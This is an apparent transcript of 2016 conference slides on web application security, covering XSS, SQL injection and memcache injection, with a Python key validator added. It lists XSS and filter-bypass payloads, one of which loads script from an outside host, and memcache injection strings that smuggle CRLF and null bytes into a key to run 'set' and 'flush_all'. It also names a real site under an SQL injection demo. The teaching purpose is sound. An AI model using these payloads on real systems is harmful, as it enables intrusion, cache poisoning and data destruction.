Web Application Security (Akademik Bilişim 2016)
TRANSCRIPT
Web Application Security
Akademik Bilişim 2016
Ömer Çıtak
#! whoami
Full-Stack Developer @ Cydets Inc.
development && security
www.omercitak.com
Social : @Om3rCitak
#! cat index
• Cross-site Scripting (XSS)
• SQL Injection
• Memcache Injection
• Upload Authentication
#! ping-pong.jpg
#! dont-trust-anyone.jpg
#! cross-site-scripting
• Reflected XSS
• DOM Based XSS
• Stored XSS
#! reflected-xss.jpg
#! reflected-xss-poc.jpg
#! dom-based-xss.jpg
#! stored-xss.jpg
#! stored-xss-poc.jpg
#! stored-xss-poc.jpg
#! cat classic-xss-payloads
• <script>alert(1)</script>
• <img src="javascript:alert('XSS');">
• <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
• <SCRIPT a=">" SRC="http://omercitak.com/xss.js"></SCRIPT>
• <video src=1 onerror=alert(1)>
• <audio src=1 onerror=alert(1)>
• <img src=x onerror=alert(1)">
#! cat xss-bypass-payloads
• <scrscriptipt>alalertert(1)</scrscriptipt>
• alert(String.fromCharCode(88,83,83))
• <IMG SRC=ja…………….')>
• <IMG SRC='vbscript:msgbox("XSS")'>
#! xss-protection-1.jpg
• Strip Tags
– http://php.net/manual/tr/function.strip-tags.php
#! xss-protection-2.jpg
• HTML Special Chars
– http://php.net/manual/tr/function.htmlspecialchars.php
#! xss-protection-3.jpg
• HttpOnly Cookies (session_set_cookie_params)
#! xss-protection-4.jpg
#! xss-protection-4.jpg
#! xss-demo.jpg
#! sql-injection
• Union Based SQL Injection
• Blind SQL Injection
• Time Based SQL Injection
#! union-based-sql-injection.jpg
#! sql-injection-login-bypass.jpg
#! cat blind-sql-injection
• What if errors are hidden? (error_reporting(0))
• What if the mysql_* functions are prefixed with «@»?
#! blind-sql-injection.jpg
Reis, won't the Creator ask you on the other side, reis, why you didn't try Blind Injection?
#! blind-sql-injection.jpg
#! blind-sql-injection-poc.jpg
#! blind-sql-injection-poc.jpg
#! cat time-based-sql-injection
• What if a query that produces no output is running in the background?
– Count Query
– Update Query
– Insert Query
– Delete Query
– Relationship Query
#! time-based-sql-injection.jpg
#! time-based-sql-injection.jpg
MySQL Server
Microsoft SQL Server
Oracle Server
#! sql-injection-poc.jpg
Amnesty International (amnesty.org.tr)
#! sql-injection-poc.jpg
#! sql-injection-demo.jpg
#! memcache-injection
#! using-memcache.jpg
#! phpstorm memcached.php
#! telnet 127.0.0.1 11211
> set key 0 10 5
> value
< STORED
> get key
< VALUE key 0 5
< value
< END
#! phpstorm memcached.php
#! phpstorm memcached.php
#! phpstorm memcached.php
#! phpstorm memcached.php
#! phpstorm memcached.php
?key=omer 0 10 6 \r\n hacked \r\n
• urlencode('\r') = %0d
• urlencode('\n') = %0a
?key=omer 0 10 6 %0d%0a hacked %0d%0a
#! phpstorm memcached.php
> set omer 0 3600 6
> hacked
< STORED
> 123456
< ERROR
#! phpstorm memcached.php
?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a
?key=aaaaa…(251) flush_all %0d%0a
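As an added example (not from the slides, whose demo is in PHP), a Python validator that enforces the memcached text-protocol key rules so the three key shapes above (CRLF, %00, 251 bytes) are rejected before they reach the wire; the function names and the constructed inputs are my own.

```python
import re

# memcached text protocol: a key is at most 250 bytes and may not contain
# whitespace or control characters, so ' ', '\r', '\n' and '\0' are all illegal.
MAX_KEY_BYTES = 250
_ILLEGAL = re.compile(rb"[\x00-\x20\x7f]")


def is_safe_memcached_key(key: str) -> bool:
    """True only if `key` can sit on a memcached command line unchanged."""
    raw = key.encode("utf-8")
    if not raw or len(raw) > MAX_KEY_BYTES:
        return False          # over-long keys get truncated/split by some clients
    return _ILLEGAL.search(raw) is None


def build_set_command(key: str, value: bytes, flags: int = 0, exptime: int = 3600) -> bytes:
    """Frame a 'set' the way a text-protocol client does, refusing unsafe keys.

    A CR/LF inside the key would end the header line early and let the rest
    of the key be read as a second command; we raise instead of framing it.
    """
    if not is_safe_memcached_key(key):
        raise ValueError("invalid memcached key")
    header = b"set " + key.encode("utf-8") + b" %d %d %d\r\n" % (flags, exptime, len(value))
    return header + value + b"\r\n"


if __name__ == "__main__":
    # Constructed inputs mirroring the slide's normal key and three bypass shapes.
    samples = [
        "omer",
        "omer 0 10 6\r\nhacked\r\n",
        "a\x00set yenikey 0 3600 6\r\nhacked\r\n",
        "a" * 251,
    ]
    for k in samples:
        print(repr(k[:24]), "safe" if is_safe_memcached_key(k) else "REJECTED")
    print(build_set_command("omer", b"123456"))
```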
#! cat vulnerable-libraries
Python : Python-pylibmc
Php : Memcached
Asp.Net : memcacheddotnetproject (1.1.5)
Java : com.meetup.memcached
#! cat safe_libraries
Python : python-memcache
Php : memcache
Java : java.net.spy.memcached
#! cat using-memcached-library
Wordpress
Joomla 3.2.2
Piwik 2.1.0
MODX Revolution 2.3
#! ascii-table.jpg
#! phpstorm memcached.php
#! upload-authentication
#! upload-authentication-poc
#! wget questions
#! exit
Thanks <3
www.omercitak.com
Social : @Om3rCitak